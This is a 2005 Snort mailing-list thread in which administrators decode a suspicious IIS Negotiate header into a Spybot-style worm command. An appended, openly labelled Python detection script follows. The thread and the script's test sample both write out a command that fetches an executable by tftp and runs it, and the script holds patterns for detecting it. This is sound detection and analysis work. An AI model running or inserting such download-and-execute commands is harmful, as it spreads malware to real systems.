Snort mailing list archives
Re: Unrecognized attack patterns against IIS
From: TPanaitescu () colorcon com
Date: Sat, 11 Jun 2005 12:53:15 -0400
That's it, "cmd /c tftp -i 0.0.0.0 GET msupdtm.exe&start msupdtm.exe&exit" among other things! Good point! Thanks
Tudor

stephane nasdrovisky <stephane.nasdrovisky () paradigmo com> 06/11/2005 12:24 PM
To: TPanaitescu () colorcon com
cc: Michael Scheidell <scheidell () secnap net>
Subject: Re: [Snort-users] Unrecognized attack patterns against IIS

Have you tried to base 64 decode this string ( http://www.opinionatedgeek.com/dotnet/tools/Base64Decode/Default.aspx )? Don't forget the trailing ==. It looks like http://www.sarc.com/avcenter/venc/data/w32.spybot.pkc.html

The decoded string contains: cmd /c tftp -i 0.0.0.0 GET msupdtm.exe

The worm filename is different in my network neighbourhood: cgy32win.exe, ms-upd.exe & win-logon.exe (98k -111k)

TPanaitescu () colorcon com wrote:
Seen that too, it seems that it is a newer "patch" from MS for IE, or IEs configured for this, trying to negotiate authorization using SPNEGO from the GSS-API. You can see the packets in full if you use a sniffer in front of that web server; I used ethereal and got the info below. Could be an attack also trying to get unauthorized access to a server. Anyone with another clue?
ASN.1 attack.
GET / HTTP/1.0
Host: X.X.X.X
Authorization: Negotiate
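The triage Stéphane describes (base64-decode the Negotiate token, restore the trailing padding, look at what is inside) can be scripted so an analyst does not have to paste captured headers into a web tool. The following is an added example, not code from this thread or from Snort; the thresholds and the two sample headers are constructed assumptions, and the "suspicious" sample only mimics the shape of the posted token (long filler run plus a command string) rather than reproducing it.

```python
import base64
import re

# Thresholds are assumptions for illustration, not values from the thread.
MAX_TOKEN_BYTES = 4096   # a legitimate SPNEGO/NTLM token is far smaller than the ~16 KB one posted
MAX_SAME_BYTE_RUN = 64   # ASN.1 structures do not contain long runs of one byte ('A' = 0x41 here)
COMMAND_MARKERS = (b"cmd /c", b"tftp -i", b".exe&start")

def decode_negotiate(header_value):
    """Return the raw bytes of an 'Authorization: Negotiate <base64>' value.
    Missing '=' padding (the 'trailing ==' from the thread) is restored before decoding."""
    scheme, _, token = header_value.strip().partition(" ")
    if scheme.lower() != "negotiate":
        raise ValueError("not a Negotiate header")
    token = token.strip()
    token += "=" * (-len(token) % 4)
    return base64.b64decode(token)

def inspect_negotiate(header_value):
    """Return a list of findings; an empty list means the token looks like a normal SPNEGO blob."""
    raw = decode_negotiate(header_value)
    findings = []
    # A SPNEGO InitialContextToken (RFC 2743) starts with the ASN.1 tag [APPLICATION 0] = 0x60.
    if not raw or raw[0] != 0x60:
        findings.append("token does not start with ASN.1 tag 0x60")
    if len(raw) > MAX_TOKEN_BYTES:
        findings.append("token is %d bytes, above %d" % (len(raw), MAX_TOKEN_BYTES))
    run = re.search(rb"(.)\1{%d,}" % (MAX_SAME_BYTE_RUN - 1), raw, re.DOTALL)
    if run:
        findings.append("run of %d identical bytes %r (filler, not ASN.1)" % (len(run.group(0)), run.group(1)))
    for marker in COMMAND_MARKERS:
        if marker in raw:
            findings.append("embedded shell command fragment %r" % marker)
    return findings

# Constructed samples (not the packet from the thread): a minimal well-formed SPNEGO-style
# token carrying the NTLMSSP OID, and a token shaped like the posted one (filler + command).
BENIGN_HEADER = "Negotiate " + base64.b64encode(
    b"\x60\x0c\x06\x0a\x2b\x06\x01\x04\x01\x82\x37\x02\x02\x0a").decode()
SUSPICIOUS_HEADER = "Negotiate " + base64.b64encode(
    b"\x60\x82\x10\x7a" + b"A" * 200
    + b"cmd /c tftp -i 0.0.0.0 GET msupdtm.exe&start msupdtm.exe&exit\x00").decode()

if __name__ == "__main__":
    for name, hdr in (("benign", BENIGN_HEADER), ("suspicious", SUSPICIOUS_HEADER)):
        print(name, inspect_negotiate(hdr) or "no findings")
```

Fed the header from a sniffer capture, the script reports the filler run and the embedded command fragment, which is the same conclusion reached by hand above.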